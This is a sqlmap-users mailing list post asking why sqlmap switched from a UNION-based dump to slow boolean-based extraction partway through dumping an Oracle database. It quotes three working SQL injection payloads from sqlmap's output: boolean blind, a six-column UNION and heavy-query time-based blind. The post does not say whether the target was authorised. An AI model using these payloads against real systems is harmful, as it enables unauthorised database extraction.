Hi!
I found an odd behavior in sqlmap. I threw it at a URL where it found this:

Place: GET
Parameter: pub

Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: XXX=' OR '1'='1' AND 5523=5523 AND 'YIrb'='YIrb

Type: UNION query
Title: Generic UNION query (NULL) - 6 columns
Payload: XXX=' OR '1'='1' UNION ALL SELECT NULL,NULL,CHR(113)||CHR(97)||CHR(101)||CHR(98)||CHR(113)||CHR(69)||CHR(111)||CHR(119)||CHR(107)||CHR(115)||CHR(118)||CHR(118)||CHR(66)||CHR(98)||CHR(115)||CHR(113)||CHR(110)||CHR(109)||CHR(107)||CHR(113),NULL,NULL,NULL FROM DUAL--

Type: AND/OR time-based blind
Title: Oracle AND time-based blind (heavy query)
Payload: XXX=' OR '1'='1' AND 4237=(SELECT COUNT(*) FROM ALL_USERS T1,ALL_USERS T2,ALL_USERS T3,ALL_USERS T4,ALL_USERS T5) AND 'DQxD'='DQxD

So, the best way to dump the DB would be to use the UNION query since it
can retrieve the whole table at a time.
Now, the funny thing is that it actually used this for the first 4 or 5
tables, which are 5 or 6 columns wide, but then, on a table with only 3
columns, it didn't. It is now using a slow-moving AND boolean-based attack
to dump the table char-by-char, but I can't understand why. Is there any known
reason for this? Or am I just missing something?
_______________________________________________
sqlmap-users mailing list
sqlmap-users@lists.sourceforge.net
https://lists.sourceforge.net/lists/listinfo/sqlmap-users